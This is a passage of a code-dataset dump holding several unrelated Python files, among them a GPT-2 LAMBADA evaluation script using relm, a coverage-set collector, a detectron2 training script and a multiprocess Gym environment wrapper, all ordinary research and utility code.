your guess is right\")\n \n#print(cards)\n#---------------------------------------------\ndef removeCards(grid,pos,replace=\"empty\"):\n loops=int(len(pos)/2)\n for i in range(loops):\n i=i*2\n row=pos[i]\n (grid[row-1])[pos[i+1]-1]=replace\n#print(grid)\n#removeCards(grid,pos=[1,1,2,2])\n#print(grid)\n#=============================== user input functions\n\n","repo_name":"zaeemyousaf/zaeem","sub_path":"softDevelopement/memoryTest_1.0_python/MemoryTest_Functions.py","file_name":"MemoryTest_Functions.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"8945527037","text":"\"\"\"Run experiments mirroring Section 3.3 of GPT2 paper.\"\"\"\n\nimport argparse\nimport pandas as pd\nimport logging\nimport time\nimport functools\nimport collections\nimport pprint\nimport string\nimport re\nimport itertools\nimport tqdm\nimport pathlib\n\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\nimport relm\n\nSUPPORTED_MODELS = [\"gpt2\", \"gpt2-medium\", \"gpt2-large\", \"gpt2-xl\"]\n\n\ndef add_logger():\n \"\"\"Attach logging to the script.\"\"\"\n logger = relm.get_relm_logger()\n logger.setLevel(level=logging.DEBUG)\n # create file handler which logs even debug messages\n fh = logging.FileHandler('lambada.log')\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(logging.WARNING)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n return logger\n\n\ndef preprocess(text):\n \"\"\"GPT-2 dataset processing.\"\"\"\n text = text.replace(\"“\", '\"')\n text = text.replace(\"”\", '\"')\n text = text.replace(\"''\", '\"')\n text = text.replace(\"``\", '\"')\n text = text.replace(\"’\", \"'\")\n text = text.replace(\"‘\", \"'\")\n text = text.replace(\"–\", \"-\")\n text = text.replace(\" ,\", \",\")\n text = text.replace(\" .\", \".\")\n text = text.replace(\"é\", \"e\")\n text = text.replace(\"—\", \"-\")\n text = text.replace(\"\\xa0\", \" \")\n text = text.replace(\"\\u200a\", \"\")\n text = text.replace(\"…\", \"...\")\n text = text.replace(\"ñ\", \"n\")\n return '\\n'+text.strip()\n\n\ndef split_text(text):\n \"\"\"Split text by newline.\"\"\"\n xs = []\n ys = []\n for series in text:\n line_str = series.strip()\n words = line_str.split(\" \")\n x = \" \".join(words[:-1])\n y = words[-1]\n xs.append(x)\n ys.append(y)\n return xs, ys\n\n\ndef get_words():\n \"\"\"Return the list of words on Unix systems.\"\"\"\n with open(\"/usr/share/dict/words\") as f:\n words = f.read().splitlines()\n return words\n\n\ndef sanitize_query_str_rust(x: str) -> str:\n \"\"\"Remove special characters from query.\"\"\"\n return (x.replace(\".\", r\"\\.\")\n .replace(\"*\", r\"\\*\")\n .replace(\"+\", r\"\\+\")\n .replace(\"?\", r\"\\?\")\n .replace(\"[\", \"\\\\[\")\n .replace(\"]\", \"\\\\]\")\n .replace(\"{\", \"\\\\{\")\n .replace(\"}\", \"\\\\}\")\n .replace(\"(\", \"\\\\(\")\n .replace(\")\", \"\\\\)\")\n .replace(\"|\", \"\\\\|\")\n .replace(\"$\", \"\\\\$\")\n .replace(\"^\", \"\\\\^\")\n )\n\n\ndef read_data():\n \"\"\"Read and process lambada.\"\"\"\n f = \"../../lambada_test.jsonl\"\n if not pathlib.Path(f).exists():\n raise RuntimeError(\"Lambada dataset '{}' does not exist.\".format(f))\n df = pd.read_json(f, lines=True)\n 
df[\"processed\"] = df[\"text\"].map(preprocess)\n text = df['processed']\n x, y = split_text(text)\n df[\"x\"] = x\n df[\"y\"] = y\n return df\n\n\ndef get_parser():\n \"\"\"Return an argparse.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, choices=SUPPORTED_MODELS,\n default=\"gpt2\",\n help=\"The model to benchmark.\")\n parser.add_argument(\"--top_k\", type=int, default=None,\n help=\"The top_k for sampling.\")\n parser.add_argument(\"--static_minimize\", action=\"store_true\",\n help=\"Statically minimize automata using encoding.\")\n parser.add_argument(\"--add_eos_token\", action=\"store_true\",\n help=\"Force EOS.\")\n parser.add_argument(\"--remove_stop_words\", action=\"store_true\",\n help=\"Remove stop words.\")\n parser.add_argument(\"--force_context_words\", action=\"store_true\",\n help=\"Only use words in context.\")\n parser.add_argument(\"--max_results\", type=int, default=None,\n help=\"The number of results to run.\")\n return parser\n\n\n@functools.lru_cache(1)\ndef get_stop_words():\n \"\"\"Return a set of stop words.\"\"\"\n # Download stopwords data, just in case it's not downloaded\n import nltk\n nltk.download(\"stopwords\")\n\n from nltk.corpus import stopwords\n stop_words = set(stopwords.words('english'))\n return stop_words\n\n\ndef run_query(model, tokenizer, query, max_samples, remove_stop_words):\n \"\"\"Run a query with the model.\"\"\"\n test_relm = relm.model_wrapper.TestableModel(model, tokenizer)\n print(\"Building query.\")\n if remove_stop_words:\n stop_words = get_stop_words()\n print(\"stop_words\", stop_words)\n print(\"him\" in stop_words)\n stop_words_str = \"|\".join(\"({})\".format(s) for s in stop_words)\n prefix = query.accept_str\n puncs = [\".\", \"!\", \"?\"]\n punctuation_str = [\"({})\".format(sanitize_query_str_rust(x)) for x in\n puncs]\n punctuation_str = \"({})\".format(\"|\".join(punctuation_str))\n suffix = punctuation_str\n filter_str = \"{} ({})({})?(\\\")?\".format(\n prefix, stop_words_str, suffix)\n print(\"Filter str: {}\".format(filter_str))\n query.experimental_filter_str = filter_str\n ret = relm.search(model, tokenizer, query)\n ret = map(lambda x: (x, time.perf_counter()), ret)\n print(\"Executing query.\")\n start_time = time.perf_counter()\n xs = []\n ts = []\n urls = []\n for x, t in ret:\n url = test_relm.tokens_to_words(x)\n if remove_stop_words:\n stop_words = get_stop_words()\n last_word = sentence_to_pred(url)\n print(\"url: {}\".format(url))\n print(\"Last word: {}\".format(last_word))\n if last_word in stop_words:\n raise RuntimeError(\"Found stop word: {}\".format(last_word))\n xs.append([int(xx) for xx in x])\n ts.append(t - start_time)\n urls.append(url)\n if max_samples and len(xs) >= max_samples:\n break\n print(\"tokens\", xs)\n print(\"urls\", urls)\n print(\"times\", ts)\n results = {\"urls\": urls,\n \"times\": ts,\n \"tokens\": xs,\n }\n token_counter = collections.Counter(map(tuple, xs))\n common_tokens = list(token_counter.most_common(100))\n print(\"Common tokens: {}\".format(\n pprint.pformat(common_tokens)))\n total = len(xs)\n common_probs = [(x, cnt / total) for x, cnt in common_tokens]\n print(\"Common tokens probs: {}\".format(\n pprint.pformat(common_probs)))\n return results\n\n\ndef sentence_to_pred(sentence):\n \"\"\"Convert a sentence into a predicted word string without punctuation.\"\"\"\n pred = sentence.split(\" \")[-1].translate(\n str.maketrans('', '', string.punctuation))\n return pred\n\n\ndef main():\n \"\"\"Run the main 
function.\"\"\"\n logger = add_logger()\n parser = get_parser()\n args = parser.parse_args()\n print(\"Args: {}\".format(dict(vars(args))))\n df = read_data()\n\n model_id = args.model\n tokenizer = AutoTokenizer.from_pretrained(model_id)\n model = AutoModelForCausalLM.from_pretrained(\n model_id, return_dict_in_generate=True,\n pad_token_id=tokenizer.eos_token_id)\n model.eval()\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n model = model.to(device, non_blocking=True)\n\n top_k = args.top_k\n max_samples = 1\n\n sample_iter = zip(df[\"x\"], df[\"y\"])\n all_results = []\n all_attempts_results = []\n\n ignore_set = {182, }\n\n if args.max_results:\n sample_iter = itertools.islice(sample_iter, args.max_results)\n sample_iter = list(sample_iter)\n sample_iter = tqdm.tqdm(sample_iter)\n\n for i, (x, y) in enumerate(sample_iter):\n logger.info(\"Starting processing sample {}: {} {}\".format(i, x, y))\n if i in ignore_set:\n continue\n if args.max_results and i >= args.max_results:\n break\n print(i)\n prefixes = [x]\n queries = [\" \".join([x, y])]\n puncs = [\".\", \"!\", \"?\"]\n punctuation_str = [\"({})\".format(sanitize_query_str_rust(x)) for x in\n puncs]\n punctuation_str = \"({})\".format(\"|\".join(punctuation_str))\n if args.force_context_words:\n words_used = set(re.findall(r'[\\w]+', x))\n words_used_str = \"({})\".format(\n \"|\".join(\"({})\".format(w) for w in words_used))\n word_str = \" ({})({})?(\\\")?\".format(words_used_str,\n punctuation_str)\n else:\n word_str = \" ([a-zA-Z]+)({})?(\\\")?\".format(punctuation_str)\n sanitized_test_strings = sanitize_query_str_rust(x) + word_str\n sanitized_test_strings = [sanitized_test_strings]\n # All but last word\n sanitized_prefix_strings = map(\n lambda x: \"({})\".format(\n sanitize_query_str_rust(x)\n ),\n prefixes,\n )\n sanitized_test_string = \"|\".join(sanitized_test_strings)\n sanitized_prefix_string = \"|\".join(sanitized_prefix_strings)\n print(\"query\", sanitized_test_string)\n print(\"prefix\", sanitized_prefix_string)\n query = relm.SearchQuery(sanitized_test_string)\n query.accept_str = sanitized_prefix_string\n query.num_samples = None\n query.backend = relm.SearchBackendType.AUTOMATA\n query.top_k_sampling = top_k\n query.sequence_length = 256\n query.experimental_advanced_parsing = True\n query.experimental_advanced_parsing_simplify = True\n query.experimental_advanced_parsing_static_minimize = \\\n args.static_minimize\n query.experimental_advanced_parsing_static_minimize_prefix_only = True\n query.experimental_regex_backend = \\\n relm.facade.RegexBackendType.RUST\n query.experimental_dijkstra = True\n query.experimental_dijkstra_beam_size = None\n query.experimental_penalized_accepted_probability = False\n query.experimental_avoid_not_accepted_probability = True\n query.experimental_fast_start = True\n query.experimental_very_fast_start = True\n query.experimental_add_eos_token = args.add_eos_token\n remove_stop_words = args.remove_stop_words\n start_time = time.perf_counter()\n start_time_s = time.time()\n msg = \"\"\n try:\n results = run_query(model, tokenizer, query, max_samples,\n remove_stop_words)\n except Exception as ex:\n # TODO(mkuchnik): Add handling\n print(ex)\n results = {\"urls\": [],\n \"times\": [],\n \"tokens\": [],\n }\n msg = str(ex)\n print(results)\n pred = sentence_to_pred(results[\"urls\"][0])\n acc = pred == y\n print(\"Predicted {} vs {} ({})\".format(pred, y, acc))\n end_time = time.perf_counter()\n end_time_s = time.time()\n elapsed_time = end_time - start_time\n 
print(\"Finished in {} seconds\".format(elapsed_time))\n df = pd.DataFrame(results)\n attempt_results = {\n \"realtime_start_time_s\": start_time_s,\n \"realtime_end_time_s\": end_time_s,\n \"start_time\": start_time,\n \"end_time\": end_time,\n \"num_results\": len(df),\n \"prefix\": prefixes[0],\n \"query\": queries[0],\n \"message\": msg,\n \"prediction\": pred,\n \"x\": x,\n \"y\": y,\n }\n # Unpack\n df[\"prefixes\"] = prefixes[0]\n df[\"query\"] = queries[0]\n attempt_df = pd.Series(attempt_results).to_frame()\n all_results.append(df)\n all_attempts_results.append(attempt_df)\n all_results_df = pd.concat(all_results)\n all_attempts_results_df = pd.concat(all_attempts_results)\n all_results = [all_results_df]\n all_attempts_results = [all_attempts_results_df]\n all_results_df.to_csv(\"results.csv\")\n all_attempts_results_df.to_csv(\"attempts_results.csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mkuchnik/relm","sub_path":"experiments/language_understanding/run_eval.py","file_name":"run_eval.py","file_ext":"py","file_size_in_byte":12161,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"78"} +{"seq_id":"27988879076","text":"import os\nimport json\n\n\ndef file2dict(file):\n res = dict()\n with open(file) as f:\n lines = f.readlines()\n for l in lines:\n l = l.strip()\n name = l.split(':')[0]\n value = l.split(':')[1]\n if name not in res.keys():\n res[name] = []\n for v in value.split(','):\n res[name].append(v)\n return res\n\n\ndef get_method_line(file):\n line_list = []\n line_num = 0\n with open(file, 'r+', encoding=\"utf-8\") as f:\n all_lines = f.readlines()\n for line in all_lines:\n line_num += 1\n line = line.strip()\n if 'def ' == line[:4]:\n line_list.append(line_num)\n continue\n return line_list\n\n\ndef get_all_method_line(base_dir):\n all_fun = 0\n method_line = dict()\n for dir_path, dir_name, files in os.walk(base_dir):\n for file in files:\n if not file.endswith('.py'):\n continue\n if '__init__.py' in file:\n continue\n file_path = os.path.join(dir_path, file)\n temp_list = get_method_line(file_path)\n all_fun += len(temp_list)\n if temp_list and len(temp_list) > 0:\n method_line[file_path] = temp_list\n print(base_dir)\n print(\"debug___: all python method line is \", all_fun)\n return method_line\n\n\ndef json2dict(file, granularity='line'):\n res = dict()\n # if granularity == 'line' or granularity == 'file':\n with open(file, 'r') as f:\n json_dict = json.load(f)\n json_dict = json_dict['files']\n for file_name in json_dict.keys():\n if '__init__.py' in file_name:\n continue\n temp = json_dict[file_name]['executed_lines']\n cov_lines_num = json_dict[file_name][\"summary\"][\"covered_lines\"]\n # executed line not equeal to covered line\n # assert int(cov_lines_num) == len(temp),\n # f'true number is {len(temp)}, while the report say it is {cov_lines_num}; file name is:{file_name}'\n # if file_name.startswith('/workplace/software/mxnet/'):\n # file_name = '/workplace/software/mxnet2/' + file_name[len('/workplace/software/mxnet/'):]\n if len(temp) == 0:\n continue\n res[file_name] = temp\n\n if granularity == 'fun':\n all_cov_lines_dict = res\n res = dict()\n base_dir = '/workplace/software/pytorch3/torch/'\n method_line = get_all_method_line(base_dir)\n\n for file, line in method_line.items():\n if file not in all_cov_lines_dict.keys():\n continue\n for def_line in line:\n if def_line in all_cov_lines_dict[file]:\n if file not in res.keys():\n res[file] = []\n res[file].append(def_line)\n return 
res\n\n\ndef xml2dict(file):\n from xml.dom import minidom\n res = dict()\n dom = minidom.parse(file)\n data = dom.documentElement\n classes = data.getElementsByTagName('class')\n for clazz in classes:\n tmp = []\n class_name = clazz.getAttribute('filename')\n all_lines = clazz.getElementsByTagName('line')\n for line in all_lines:\n if line.getAttribute('branch').strip() != '' and line.getAttribute('hits').strip() == '1':\n line_num = line.getAttribute('number')\n # print(line_num)\n cov_state = line.getAttribute('condition-coverage')\n cov_state = cov_state.strip().split(' ')[1][1:-1]\n total_branch_this = int(cov_state.split('/')[1])\n cov_branch_this = int(cov_state.split('/')[0])\n missing_state = line.getAttribute('missing-branches').strip()\n missing_branch_list = missing_state.split(',')\n # 手动分析发现,对于部分覆盖,都是only缺少一个branch\n for i in range(cov_branch_this):\n if str(int(line_num)+1) in missing_branch_list:\n tmp.append(f'{line_num}_{i+1}')\n # print(missing_state)\n else:\n tmp.append(f'{line_num}_{i}')\n # print(missing_state)\n if len(tmp) != 0:\n # if class_name.startswith('/workplace/software/pytorch3/'):\n # class_name = '/workplace/software/mxnet2/' + class_name[len('/workplace/software/mxnet/'):]\n res[class_name] = tmp\n return res\n\n\ndef dict2set(dict, granularity='line'):\n res = set()\n if granularity == 'file':\n for k in dict.keys():\n res.add(k)\n else:\n for k, v in dict.items():\n for t in v:\n res.add(k+f'_{t}')\n return res\n\n\n# def calc_unique(dict_a, dict_b, granularity='line'):\n# diff_num = 0\n# # the unique of b related to a\n# if granularity == 'line':\n# for k, value in dict_b.items():\n# if k not in dict_a:\n# diff_num += len(value)\n# continue\n# for v_item in value:\n# if v_item not in dict_a[k]:\n# diff_num += 1\n#\n# elif granularity == 'file':\n# diff_file = set()\n# for k, value in dict_b.items():\n# if k not in dict_a:\n# diff_file.add(k) # unique file\n# continue\n# diff_num = len(diff_file)\n# return diff_num\n#\n#\n# def get_unique_cov_c(file_a, file_b, granularity='line'):\n# dict_a = file2dict(file_a)\n# dict_b = file2dict(file_b)\n# diff_num = calc_unique(dict_a, dict_b)\n# return diff_num\n#\n#\n# def get_unique_cov_python(file_a, file_b, granularity='line'):\n# dict_a = json2dict(file_a)\n# dic_b = json2dict(file_b)\n# diff_num = calc_unique(dict_a, dic_b)\n# return diff_num\n#\n#\n# def get_unique_coverage(pro_a, pro_b, granularity='line'):\n# pro_a_c = pro_a + 'c'\n# pro_a_python = pro_a + 'python/coverage.json'\n#\n# pro_b_c = pro_b + 'c'\n# pro_b_python = pro_b + 'python/coverage.json'\n#\n# if granularity == 'line':\n# file_name = 'stmt_info.txt'\n# else:\n# assert False, \"not support yet!\"\n#\n# diff_num_c = get_unique_cov_c(os.path.join(pro_a_c, file_name), os.path.join(pro_b_c, file_name))\n# diff_num_python = get_unique_cov_python(pro_a_python, pro_b_python)\n# diff_num = diff_num_c + diff_num_python\n# return diff_num\n\n\ndef get_all_set(pro, granularity=\"line\"):\n pro_c = pro + 'c'\n pro_python = pro + 'python/coverage.json'\n if granularity == 'line' or granularity == 'file':\n file_name = 'stmt_info.txt'\n elif granularity == 'fun':\n file_name = 'fun_info.txt'\n elif granularity == 'branch':\n file_name = 'branch_info.txt'\n pro_python = pro + 'python/coverage.xml'\n else:\n assert False, \"not support yet!\"\n pro_c = os.path.join(pro_c, file_name)\n dict_c = file2dict(pro_c)\n if granularity == 'branch':\n dict_python = xml2dict(pro_python)\n else:\n dict_python = json2dict(pro_python, granularity)\n # print(\"the 
total cov python file number is \", len(dict_python))\n import numpy as np\n print(\"the total cov line of python is \", np.sum([len(i) for i in dict_python.values()]))\n set_c = dict2set(dict_c, granularity)\n set_python = dict2set(dict_python, granularity)\n return set_c, set_python\n\n\nif __name__ == '__main__':\n # testsuite_cov = '../pytorch_cov/unit_cov/mxnet/res_cov_08_03/0/'\n cradle_cov = './audee_cov_pt_6models/0/'\n # lemon_cov = './CovByLemon/lemon_cov_pt_8models/99/'\n audee_cov = './audee_cov_pt_6models/99/'\n\n all_pro = [cradle_cov, audee_cov] # lemon_cov,\n\n # cradle_audee = get_unique_coverage(cradle_cov, audee_cov, granularity=\"line\")\n # cradle_lemon = get_unique_coverage(cradle_cov, lemon_cov, granularity=\"line\")\n # cradle_testsuite = get_unique_coverage(cradle_cov, testsuite_cov, granularity=\"line\")\n #\n # lemon_audee = get_unique_coverage(lemon_cov, audee_cov, granularity='line')\n # audee_lemon = get_unique_coverage(audee_cov, lemon_cov, granularity='line')\n #\n # print(cradle_lemon, cradle_audee, cradle_testsuite)\n # print(lemon_audee, audee_lemon)\n # granularity = 'fun'\n granularity = 'line'\n # granularity = 'branch'\n for pro in all_pro:\n pro_name = pro.split('/')[1].split('_')[0]\n if '/audee_cov_pt_6models/0/' in pro:\n pro_name = 'cradle'\n elif 'res_cov_08_03' in pro:\n pro_name = 'testsuite'\n print(pro_name)\n c, python = get_all_set(pro, granularity)\n with open(f'{granularity}_{pro_name}_set.txt', mode='w') as f:\n for i in c:\n f.write(i+'\\n')\n for j in python:\n # if j.startswith('/workplace/software/mxnet/'):\n # j = '/workplace/software/mxnet2/' + j[len('/workplace/software/mxnet/'):]\n f.write(j+'\\n')\n print(len(c) + len(python))\n","repo_name":"defects4dll/CollectPytorchCov","sub_path":"get_unique_cov.py","file_name":"get_unique_cov.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72705864253","text":"import os\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.engine import DefaultTrainer\nfrom detectron2.engine import default_argument_parser, default_setup, launch\nfrom detectron2.evaluation import COCOEvaluator\nfrom detectron2.evaluation import verify_results\nfrom detectron2.model_zoo import get_config_file, get_checkpoint_url\nfrom detectron2.utils import comm as comm\nfrom loguru import logger\n\n\nclass Trainer(DefaultTrainer):\n @classmethod\n def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n return COCOEvaluator(dataset_name, cfg, True, output_folder)\n\n\ndef setup(args):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n\n if args.dataset == \"vrd\":\n from xib.datasets.vrd import register_vrd\n\n register_vrd(args.data_root)\n elif args.dataset == \"hico\":\n from xib.datasets.hico_det import register_hico\n\n register_hico(args.data_root)\n else:\n raise ValueError(f\"Unknown dataset: {args.dataset}\")\n\n cfg = get_cfg()\n cfg.merge_from_file(\n get_config_file(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\")\n )\n\n cfg.MODEL.WEIGHTS = get_checkpoint_url(\n \"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\"\n )\n cfg.DATASETS.TRAIN = (f\"{args.dataset}_object_detection_train\",)\n cfg.DATASETS.TEST = (f\"{args.dataset}_object_detection_test\",)\n\n cfg.SOLVER.IMS_PER_BATCH = 
1\n # cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128\n\n cfg.SOLVER.BASE_LR = 0.00025\n cfg.SOLVER.MAX_ITER = 300\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = len(\n MetadataCatalog.get(f\"{args.dataset}_object_detection_train\").thing_classes\n )\n\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n return cfg\n\n\ndef main(args):\n cfg = setup(args)\n\n if args.eval_only:\n model = Trainer.build_model(cfg)\n DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(\n cfg.MODEL.WEIGHTS, resume=args.resume\n )\n res = Trainer.test(cfg, model)\n if comm.is_main_process():\n verify_results(cfg, res)\n return res\n\n trainer = Trainer(cfg)\n trainer.resume_or_load(resume=args.resume)\n return trainer.train()\n\n\n\"\"\"\n# Example:\npython -m xib.preprocessing.train_detectron \\\n --dataset=vrd \\\n --data-root=data/raw/vrd \\\n --eval-only\n\"\"\"\nif __name__ == \"__main__\":\n parser = default_argument_parser()\n parser.add_argument(\n \"--dataset\",\n required=True,\n help=\"Which dataset to use.\",\n choices=[\"hico\", \"vrd\"],\n )\n parser.add_argument(\n \"--data-root\", required=True, help=\"Where the raw dataset is stored.\"\n )\n args = parser.parse_args()\n\n if args.config_file != \"\":\n logger.warning(f\"Config file will be ignored: {args.config_file}\")\n del args.config_file\n\n print(\"Command Line Args:\", args)\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n )\n","repo_name":"baldassarreFe/ws-vrd","sub_path":"src/xib/preprocessing/train_detectron.py","file_name":"train_detectron.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"78"} +{"seq_id":"13722493669","text":"#!/usr/bin/env python\n# Vectorized environment implementation based on OpenAI Gym| Praveen Palanisamy\n# Chapter 8, Hands-on Intelligent Agents with OpenAI Gym, 2018\n\nimport multiprocessing as mp\nimport gym\nfrom abc import ABC, abstractmethod\nimport numpy as np\nimport cv2\n\nclass VecEnv(ABC):\n \"\"\"\n An abstract asynchronous, vectorized environment.\n \"\"\"\n def __init__(self, num_envs, observation_space, action_space):\n self.num_envs = num_envs\n self.observation_space = observation_space\n self.action_space = action_space\n\n @abstractmethod\n def reset(self):\n \"\"\"\n Reset all the environments and return an array of\n observations, or a tuple of observation arrays.\n\n If step_async is still doing work, that work will\n be cancelled and step_wait() should not be called\n until step_async() is invoked again.\n \"\"\"\n pass\n\n @abstractmethod\n def step_async(self, actions):\n \"\"\"\n Tell all the environments to start taking a step\n with the given actions.\n Call step_wait() to get the results of the step.\n\n You should not call this if a step_async run is\n already pending.\n \"\"\"\n pass\n\n @abstractmethod\n def step_wait(self):\n \"\"\"\n Wait for the step taken with step_async().\n\n Returns (obs, rews, dones, infos):\n - obs: an array of observations, or a tuple of\n arrays of observations.\n - rews: an array of rewards\n - dones: an array of \"episode done\" booleans\n - infos: a sequence of info objects\n \"\"\"\n pass\n\n @abstractmethod\n def close(self):\n \"\"\"\n Clean up the environments' resources.\n \"\"\"\n pass\n\n def step(self, actions):\n self.step_async(actions)\n return self.step_wait()\n\n def render(self):\n print('WARNING:Render not defined for 
%s'%self)\n\n @property\n def unwrapped(self):\n return self\n\n\nclass ResizeFrame(gym.ObservationWrapper):\n def __init__(self,env):\n gym.ObservationWrapper.__init__(self, env)\n self.desired_width = 84 # Change this as necessary. 84 is not a magic number.\n self.desired_height = 84\n def observation(self, obs):\n if len(obs.shape) == 3: # Observations are image frames\n obs = cv2.resize(obs, (self.desired_width, self.desired_height))\n return obs\n\ndef run_env_in_sep_proc(env_name, shared_pipe, parent_pipe, stack=False, scale_rew=False):\n \"\"\"\n Create and run an environment instance (remote or local) in a separate proc\n \"\"\"\n parent_pipe.close()\n\n env = gym.make(env_name)\n # Apply env pre-processing here if needed\n #if scale_rew:\n # env = RewardScaler(env)\n #env = CustomWarpFrame(env)\n #env = NormalizedEnv(env)\n env = ResizeFrame(env)\n\n while True:\n method, data = shared_pipe.recv()\n if method == 'step':\n next_obs, rew, done, info = env.step(data)\n if done:\n next_obs = env.reset()\n shared_pipe.send((next_obs, rew, done, info))\n\n if method == 'reset':\n obs = env.reset()\n shared_pipe.send(obs)\n\n if method == 'get_spaces':\n shared_pipe.send((env.observation_space, env.action_space))\n\nclass SubprocVecEnv(VecEnv):\n def __init__(self, env_names, spaces=None):\n \"\"\"\n env_names: list of (gym) environments to run in sub/separate processes\n \"\"\"\n self.waiting = False\n self.closed = False\n num_envs = len(env_names)\n self.remotes, self.work_remotes = zip(*[mp.Pipe() for _ in range(num_envs)])\n self.ps = []\n for (env_name, worker_conn, parent_conn) in zip(env_names, self.work_remotes, self.remotes):\n self.ps.append(mp.Process(target=run_env_in_sep_proc, args=(env_name, worker_conn, parent_conn)))\n for p in self.ps:\n p.daemon = True # if the main process crashes, we should not cause things to hang\n p.start()\n\n for remote in self.work_remotes:\n remote.close()\n\n self.remotes[0].send(('get_spaces', None))\n observation_space, action_space = self.remotes[0].recv()\n VecEnv.__init__(self, num_envs, observation_space, action_space)\n\n def step_async(self, actions):\n for remote, action in zip(self.remotes, actions):\n remote.send(('step', action))\n self.waiting = True\n\n def step_wait(self):\n results = [remote.recv() for remote in self.remotes]\n self.waiting = False\n obs, rews, dones, infos = zip(*results)\n return np.stack(obs), np.stack(rews), np.stack(dones), infos\n\n def reset(self):\n for remote in self.remotes:\n remote.send(('reset', None))\n return np.stack([remote.recv() for remote in self.remotes])\n\n def close(self):\n if self.closed:\n return\n if self.waiting:\n for remote in self.remotes:\n remote.recv()\n for remote in self.remotes:\n remote.send(('close', None))\n for p in self.ps:\n p.join()\n self.closed = True\n\n\nclass EnvProc(mp.Process):\n def __init__(self, env_name, requests):\n super(EnvProc, self).__init__()\n self.env_name = env_name\n self.requests= requests\n self.terminate = False\n\n def run(self):\n self.env = gym.make(self.env_name)\n while not self.terminate:\n #while not self.request_queue.empty() or self.request_queue.qsize():\n request = self.requests.recv()\n result = self.call_env(request[\"method\"], request[\"data\"])\n self.requests.send(result)\n\n def call_env(self, method, data):\n if method == \"step\":\n next_obs, reward, done, info = self.env.step(data)\n return (next_obs, reward, done, info)\n elif method == \"reset\":\n obs = self.env.reset()\n return obs\n elif method == \"render\":\n 
self.env.render()\n elif method == \"observation_space\":\n return self.env.observation_space\n elif method == \"action_space\":\n return self.env.action_space\n elif method == \"close\":\n self.env.close()\n self.terminate = True\n\n\nclass EnvProxy(object):\n def __init__(self, env_name):\n self.pipe, self.child_pipe = mp.Pipe()\n self.env_proc = EnvProc(env_name, self.child_pipe)\n self.env_proc.start()\n def step(self, action):\n self.pipe.send({\"method\": \"step\", \"data\": action})\n return self.pipe.recv()\n def reset(self):\n self.pipe.send({\"method\": \"reset\", \"data\": None})\n return self.pipe.recv()\n def render(self):\n self.pipe.send({\"method\": \"render\", \"data\": None})\n @property\n def observation_space(self):\n self.pipe.send({\"method\": \"observation_space\", \"data\": None})\n return self.pipe.recv()\n @property\n def action_space(self):\n self.pipe.send({\"method\": \"action_space\", \"data\": None})\n return self.pipe.recv()\n def close(self):\n self.pipe.send({\"method\": \"close\", \"data\": None})\n self.env_proc.join()\n\n\ndef make_env(env_name):\n env_proxy= EnvProxy(env_name)\n return env_proxy\n","repo_name":"PacktPublishing/Hands-On-Intelligent-Agents-with-OpenAI-Gym","sub_path":"ch8/environment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","stars":322,"dataset":"github-code","pt":"78"} +{"seq_id":"3130468024","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 13 10:21:25 2019\n\n@author: 10809305\n\"\"\"\nimport os\nimport shutil\nimport random\nimport pandas as pd\n\nfrom fileIO import csv_path_list\n\ndef collect_roi(path):\n \n csv_list = csv_path_list(path)\n df_all = None\n for idx in range(len(csv_list)):\n print(csv_list[idx])\n df_csv = pd.read_csv(csv_list[idx], header=0, index_col=None)\n df_filter = df_csv[['kb_model', 'location' , 'description']]\n df_all = pd.concat([df_all, df_filter], axis = 0)\n \n# df_all.to_csv(os.path.join(os.path.dirname(), 'all.csv'), header = True, index = False)\n return df_all\n\n\ndef df_img(image_dir, df_csv):\n img_record, error_record = [], []\n columns = ['img_path', 'kb_model', 'label','location', 'description']\n i = 0\n for root, dirs, files in os.walk(image_dir):\n\n for file in files:\n if not file.endswith('.jpg'): continue\n _img_kb = os.path.basename(os.path.dirname(root))\n _label = os.path.basename(root)\n if '@' in file: _loc = file.split('@')[1].split('_')[0]\n else: _loc = file.split('_')[2]\n filter_kb_loc = (df_csv['kb_model'] == _img_kb) & (df_csv['location'] == _loc)\n _img_desc = df_csv[filter_kb_loc]['description'].values.tolist()\n\n if len(_img_desc) == 1:\n i += 1\n _img_desc = _img_desc[0]\n print('\\rNum: %s , img: %s' % (i, file), end='')\n img_record.append([os.path.join(root, file), _img_kb, _label, _loc, _img_desc])\n else:\n error_record.append([file, _img_kb, _label, _loc, len(_img_desc)])\n\n \n print('')\n df_error = pd.DataFrame(error_record, columns=columns)\n df_error.to_csv(os.path.join(image_dir, 'ROIerror_record.csv'), header = True, index = False)\n df_img_record = 